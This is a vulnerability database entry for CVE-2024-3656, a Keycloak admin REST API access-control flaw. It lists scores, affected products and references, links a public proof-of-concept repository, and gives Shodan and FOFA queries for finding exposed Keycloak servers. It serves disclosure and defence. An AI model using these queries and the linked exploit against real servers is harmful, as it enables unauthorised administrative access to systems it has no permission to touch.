CVE-2024-3656

HIGH NUCLEI

Org.keycloak Keycloak-services < 24.0.5 - Information Disclosure

Title source: rule

Description

A flaw was found in Keycloak. Certain endpoints in Keycloak's admin REST API allow low-privilege users to access administrative functionalities. This flaw allows users to perform actions reserved for administrators, potentially leading to data breaches or system compromise.

Exploits (1)

nomisec WRITEUP 28 stars

by h4x0r-dz · poc

https://github.com/h4x0r-dz/CVE-2024-3656

View Code ZIP pw:eip

Nuclei Templates (1)

Keycloak < 24.0.5 - Broken Access Control

HIGHVERIFIEDby iamnoooob,rootxharsh,pdresearch

Shodan: http.favicon.hash:"-1105083093" || http.html:"keycloak" || http.title:"keycloak"

FOFA: icon_hash=-1105083093 || body="keycloak" || title="keycloak"

References (8)

[Various Sources] https://github.com/advisories/GHSA-2cww-fgmg-4jqc

[Various Sources] https://github.com/hnsecurity/vulns/blob/main/HNS-2024-08-Keycloak.md

[Various Sources] https://news.ycombinator.com/item?id=42136000

[Various Sources] https://security.humanativaspa.it/an-analysis-of-the-keycloak-authentication-system/

[Vendor Advisory] https://access.redhat.com/errata/RHSA-2024:3572

[Vendor Advisory] https://access.redhat.com/errata/RHSA-2024:3575

[Vendor Advisory] https://access.redhat.com/security/cve/CVE-2024-3656

[Issue Tracking] https://bugzilla.redhat.com/show_bug.cgi?id=2274403

Scores

CVSS v3 8.1

EPSS 0.8966

EPSS Percentile 99.6%

Attack Vector NETWORK

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Details

CWE

CWE-200

Status published

Products (4)

org.keycloak/keycloak-services 0 - 24.0.5Maven

Red Hat/Red Hat Build of Keycloak

Red Hat/Red Hat JBoss Enterprise Application Platform 8

Red Hat/Red Hat Single Sign-On 7

Published Oct 09, 2024

Tracked Since Feb 18, 2026